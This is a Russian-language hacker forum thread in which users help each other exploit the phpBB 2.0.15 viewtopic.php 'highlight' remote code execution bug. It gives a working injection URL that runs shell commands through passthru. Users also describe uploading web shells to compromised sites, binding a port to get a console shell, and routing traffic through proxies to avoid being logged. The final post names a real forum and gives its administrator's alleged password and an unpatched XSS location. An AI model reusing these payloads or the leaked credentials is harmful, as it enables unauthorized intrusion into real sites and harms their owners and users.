Такое дело. Шелл вроде я залил, Code: rw-r--r-- 1 u3603347 ftpusers 43265 Jun 30 17:38 search.php rw-r--r-- 1 u3603347 ftpusers 0 Jul 4 14:32 shell.php rw-r--r-- 1 u3603347 ftpusers 2958 Jul 4 14:32 shell.php.1 rw-r--r-- 1 u3603347 ftpusers 2958 Jul 4 14:32 shell.php.2 rw-r--r-- 1 u3603347 ftpusers 2958 Jul 4 14:32 shell.php.3 rw-r--r-- 1 u3603347 ftpusers 2958 Jul 4 14:32 shell.php.4 rw-r--r-- 1 u3603347 ftpusers 2958 Jul 4 14:32 shell.php.5 rwxr-xr-x 6 u3603347 ftpusers 4096 Jun 30 17:38 templates rw-r--r-- 1 u3603347 ftpusers 5 Jul 4 01:26 test.txt rw-r--r-- 1 u3603347 ftpusers 691 Nov 21 2004 update.php rw-r--r-- 1 u3603347 ftpusers 23154 Oct 19 2004 viewforum.php rw-r--r-- 1 u3603347 ftpusers 7233 May 9 19:42 viewonline.php rw-r--r-- 1 u3603347 ftpusers 45228 May 9 19:42 viewtopic.php Использую Putty чтоб подконектиться, а он мне Access Denied. Что ж может быть не так?
Привет, у меня немного по-другому исчезает само сообщение на странице т.е там где текст ничего нету, но в сорсе кода тоже ничего не отображает, в чем может быть дело ?
Azazel, а ты права доступа взглянул??) Видимо, нет.. rwxr-xr-x - недостаточно прав.. про другие я и не говорю.. Felix, ну ты проверь сначала, работает ли сама бага.. если да, то вышеуказанный пример точно должен быть =). Ведь ты всего лишь просматриваешь файл.. и содерживое в нём должно просматриваться..!
Походу уязвим т.к когда я начинаю задавать какие либо параметры, от форума остается только шапка, но ничего не выполняется и следовательно не выводиться тоже как быть, мот кто встречал ??
Я вот пишу: _http://saitik/forum/viewtopic.php?t=7&highlight=%27.passthru($HTTP_GET_VARS[cmd]).%27&cmd=ls ../../;ls%20-la Он не показывает права на папки, что не так? Да и где-то читал, что нада посмореть качалку, которая стоит на сайте, как и где это зделать?
>>Использую Putty чтоб подконектиться, а он мне Access Denied. Что ж может быть не так? =))))))))) лооооол это веб шел...набивай адрес в урл
А не прокатывает =( Выдает вот так: ../../: cgi-bin cgi-bin-dist data data-dist error error-dist icons icons-dist И всё... ну что ещё мона зделать...
ГЫ: ага прям он те ща на тарелочке с добавкой =) Что не так??...то шо ты залил, это веб-шелл а не шелл по ssh.... хошь консольный получить, то прибинди порт, и коннекться...а как дальше, то читай книжки =)
кстати, если конектишся паттей по ssh без всяких там соксификаторов, то 4ей айпи будет в логах серванта, мой, или прокси, указанной в ослике??? Это так, 4тобы не спалиться лишний раз...
Патти к ослу никак не относитса, так что взаимосвязки настроек прокситса настройками бровзера там нет, хотя не проверял... Так что используй proxycap или proxifier которые туннелируют все твои исходяшие с машини коннекты... и ваще это уже оффтоп, сдесь обсуждаетса эксплотация дыры в 2.0.15 а не добыча шелла на сервер
воришка что за команды ты там мутишь??чтобы с правами показывалось надо всего лишь так написать: ls -la
viewtopic.php?t=7&highlight=%27.passthru($HTTP_GET_VARS[cmd]).%27&cmd=ls%20../../%20-la. Т.е. выходим на 2 каталога выше, и сморим права. Не отображается тока папки. Пишем ls%20../../%20;la, тоже.... ls%20../../%20;-la тоже... Чё делать то может на какой сайтик дадите пример?
Просьба такая, зделайте кто-то маленький гуид по лодерам (wget, curl).Плиз и как узнать где они стоят или вообше стоят ли. Плиззз
не хочу зоздавать новую тему просто отпишусь тут на этом форуме www.hpforum.ru админ просто ...... его пасс gegcde и действуют все дыры, ему 2 недели назад посылали письмо о том как их закрыть а он говорит что типа и слышать об этом не хочет!!! короче там xss досихпор висит моно посмотреть через оперу в теме http://www.hpforum.ru/viewtopic.php?t=2&start=300 под ником exbb
